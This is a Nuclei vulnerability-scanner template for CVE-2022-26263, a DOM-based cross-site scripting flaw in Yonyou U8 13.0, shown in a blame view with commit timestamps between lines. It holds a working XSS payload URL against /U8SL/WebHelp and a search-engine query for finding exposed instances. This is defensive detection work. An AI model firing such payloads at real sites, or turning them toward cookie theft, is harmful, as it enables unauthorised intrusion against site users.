nuclei-templates/http/cves/2022/CVE-2022-26263.yaml

35 lines
1.2 KiB
YAML
Raw Normal View History

2022-10-06 08:11:10 +00:00
id: CVE-2022-26263
info:
name: Yonyou U8 13.0 - Cross-Site Scripting
2022-10-12 16:29:35 +00:00
author: edoardottt,theamanrawat
2022-10-06 08:11:10 +00:00
severity: medium
description: |
Yonyou U8 13.0 contains a DOM-based cross-site scripting vulnerability via the component /u8sl/WebHelp. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
2022-10-06 08:11:10 +00:00
reference:
- https://github.com/s7safe/CVE/blob/main/CVE-2022-26263.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-26263
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
2022-10-06 08:11:10 +00:00
cve-id: CVE-2022-26263
cwe-id: CWE-80
2022-10-06 08:11:10 +00:00
metadata:
2022-10-12 16:29:35 +00:00
verified: true
2023-01-24 10:11:16 +00:00
google-query: inurl:/u8sl/WebHelp
2022-10-12 16:29:35 +00:00
tags: cve,cve2022,yonyou,xss
2022-10-06 08:11:10 +00:00
2022-10-12 16:29:35 +00:00
headless:
- steps:
- args:
2022-10-28 12:49:33 +00:00
url: '{{BaseURL}}/U8SL/WebHelp/PB_Por_zh-CN.htm?wvstest=javascript:domxssExecutionSink(1,"%27"><xsstag>()locxss")#javascript:console.log(document.domain)'
2022-10-12 16:29:35 +00:00
action: navigate
- action: waitload
2022-10-06 08:11:10 +00:00
matchers:
2022-10-06 09:50:27 +00:00
- type: word
words:
2022-10-12 16:29:35 +00:00
- '<frame src="javascript:console.log(document.domain)"'
2022-11-10 16:49:28 +00:00
- 'webhelp4.js'
condition: and